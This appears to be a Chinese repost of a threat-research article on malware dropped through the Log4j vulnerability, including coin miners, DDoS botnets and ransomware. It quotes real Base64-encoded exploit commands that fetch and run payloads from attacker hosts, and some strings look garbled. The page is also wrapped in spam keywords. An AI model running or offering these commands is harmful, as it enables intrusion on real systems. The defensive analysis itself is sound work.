成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

盤點(diǎn):Log4j漏洞帶來(lái)的深遠(yuǎn)影響

2022-10-05    分類: 網(wǎng)站建設(shè)

上周,Log4j 漏洞顛覆了互聯(lián)網(wǎng),影響是巨大。攻擊者也已經(jīng)開始利用該漏,到目前為止,Uptycs 研究人員已經(jīng)觀察到與 coinminers、DDOS 惡意軟件和一些勒索軟件變種相關(guān)的攻擊,這些攻擊積極利用了此漏洞。

未來(lái)幾天勒索軟件攻擊的規(guī)??赡軙?huì)增加。由于該漏洞非常嚴(yán)重,因此可能還會(huì)發(fā)現(xiàn)一些可以繞過(guò)當(dāng)前補(bǔ)丁級(jí)別或修復(fù)程序的變體。因針對(duì)這種攻擊持續(xù)監(jiān)控和強(qiáng)化系統(tǒng)是極其重要的。

Uptycs 此前在博客中為其客戶分享了有關(guān)補(bǔ)救和檢測(cè)步驟的詳細(xì)信息 。并討論了攻擊者利用 Log4j 漏洞的各種惡意軟件類別。Uptycs 威脅研究團(tuán)隊(duì)確定了投放在易受攻擊的服務(wù)器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件,如 Kinsing 和 Xmrig coinminers,以及 Dofloo、Tsunami 和 Mirai 僵尸網(wǎng)絡(luò)惡意軟件。除了這些惡意軟件系列,攻擊者已經(jīng)開始在在易受CVE-2021-44228服務(wù)器上部署勒索軟件。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

1. Xmrig

Xmrig 是一個(gè)開源的 Monero CPU Miner,用于挖掘 Monero 加密貨幣。攻擊者利用 Log4j2 漏洞后,攻擊者試圖運(yùn)行惡意 shell 腳本,其中包含下載 xmrig 礦工的命令。

命令是 93.189.42 8 []:5557,/基本/命令/ Base64/編碼 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。

此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6

shell 腳本(見圖 1)首先殺死已經(jīng)在運(yùn)行的礦工二進(jìn)制文件,然后從互聯(lián)網(wǎng)下載 xmrig 礦工二進(jìn)制文件并運(yùn)行它。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 1:Shell 腳本下載并執(zhí)行 Xmrig

2. Kinsing

Kinsing 是一種自我傳播的加密挖掘惡意軟件,以前針對(duì)配置錯(cuò)誤的開放 Docker Daemon API 端口。Kinsing 惡意軟件是用 golang 編寫的,通常是通過(guò)惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規(guī)避技術(shù),如 setfacl 使用、chattr 使用、日志刪除命令等。

大規(guī)模掃描后的攻擊者試圖在易受攻擊的服務(wù)器上放置 kinsing 二進(jìn)制文件。攻擊者用來(lái)刪除和運(yùn)行 shell 腳本的:92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.

在shell腳本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我們可以看到攻擊者在 shell 腳本運(yùn)行時(shí)放置了刪除 kinsing 惡意軟件二進(jìn)制文件的命令(見圖 2)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 2:通過(guò) shell 腳本下載 Kinsing

kinsing shell 腳本還包含與 docker 相關(guān)的命令,這些命令會(huì)殺死受害系統(tǒng)上已經(jīng)運(yùn)行的礦工進(jìn)程(如果存在)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 3:用于殺死已經(jīng)運(yùn)行的礦工的 docker 命令

3. DDoS 僵尸網(wǎng)絡(luò)負(fù)載

在一些漏洞利用嘗試中,攻擊者試圖刪除分布式拒絕服務(wù) (DDoS) 惡意軟件二進(jìn)制文件,如 dofloo、Mirai。

4. Dofloo

Dofloo (又名 AeSDdos,flooder)是一種DDoS類型的惡意軟件,可對(duì)目標(biāo) IP 地址進(jìn)行各種泛洪攻擊,如 ICMP 和 TCP。除了泛洪攻擊外,Dofloo 通過(guò)操縱受害者系統(tǒng)中的 rc.local 文件來(lái)確保其持久性。它的一些變體在受害計(jì)算機(jī)上部署了加密貨幣礦工。

在情報(bào)系統(tǒng)中,攻擊者也在利用易受攻擊的服務(wù)器后投放 Dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []:1389,/基本/命令/ Base64編碼/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下圖(參見圖 4)顯示了 Dofloo 對(duì) rc.local 的操作:6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548)在 Log4j 后利用中使用的變體。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 4:Dofloo 操作 rc.local

5. mushtik

海嘯(又名mushtik)是基于DDoSflooder一個(gè)跨平臺(tái)的惡意軟件,在下載文件過(guò)程中被感染系統(tǒng)中執(zhí)行shell的命令。海嘯樣本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作為持久性。除了持久性,它還刪除一個(gè)副本 /dev/shm/ 目錄作為防御規(guī)避策略(參見圖 5)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 5:Tsunami 通過(guò) cron 從 /dev/shm 運(yùn)行

6. Mirai

Mirai是一種惡意軟件,它感染在 ARC 處理器上運(yùn)行的智能設(shè)備,將它們變成一個(gè)遠(yuǎn)程控制的機(jī)器人網(wǎng)絡(luò)。Mirai 還通過(guò)惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。該命令使用 wget 實(shí)用程序從攻擊者 C2,62.210.130[.]250 中刪除 Mirai 惡意軟件(見圖 6)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 6:從 C2 下載 mirai 的 Shell 腳本

7. Linux

攻擊者還利用 Log4j 漏洞在易受攻擊的服務(wù)器上投放 Linux 勒索軟件。攻擊者在利用 Log4j 漏洞后試圖刪除Linux 勒索軟件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的,并操縱 ssh 文件在受害者系統(tǒng)中傳播自身。攻擊者丟棄的贖金票據(jù)如下所示(見圖 7)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 7:Linux 贖金說(shuō)明

8. Uptycs EDR

Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 進(jìn)程掃描的行為規(guī)則成功檢測(cè)到所有有效負(fù)載。下面顯示了我們的行為規(guī)則主動(dòng)檢測(cè)到的 Linux 勒索軟件的示例(參見圖 8)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 8:使用 Uptycs EDR 檢測(cè)勒索軟件

9. Xmrig

除了行為規(guī)則之外,當(dāng) YARA 檢測(cè)被觸發(fā)時(shí),Uptycs EDR 通過(guò)威脅研究團(tuán)隊(duì)策劃的 YARA 規(guī)則分配威脅配置文件。用戶可以導(dǎo)航到檢測(cè)警報(bào)中的工具包數(shù)據(jù)部分,然后單擊名稱以查找工具包的說(shuō)明。Uptycs EDR 檢測(cè)到的 Xmrig 惡意軟件活動(dòng)的摘錄如下所示(見圖 9)。

盤點(diǎn):Log4j 漏洞帶來(lái)的深遠(yuǎn)影響

圖 9:使用 Uptycs EDR 進(jìn)行 XMrig 檢測(cè)

網(wǎng)頁(yè)題目:盤點(diǎn):Log4j漏洞帶來(lái)的深遠(yuǎn)影響
文章位置:http://jinyejixie.com/news4/201854.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計(jì)微信小程序網(wǎng)站導(dǎo)航、微信公眾號(hào)用戶體驗(yàn)、網(wǎng)站設(shè)計(jì)公司

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)
深圳市| 绥滨县| 平远县| 肃宁县| 南部县| 彰化市| 耿马| 调兵山市| 松江区| 汉沽区| 阿图什市| 武乡县| 聂拉木县| 富平县| 峡江县| 怀安县| 平远县| 织金县| 本溪市| 苍山县| 嘉峪关市| 潜江市| 永靖县| 海安县| 当阳市| 白河县| 微博| 沛县| 天峨县| 贵定县| 黔西县| 镇安县| 思南县| 沁阳市| 台前县| 嘉荫县| 杨浦区| 临汾市| 南涧| 增城市| 湖州市|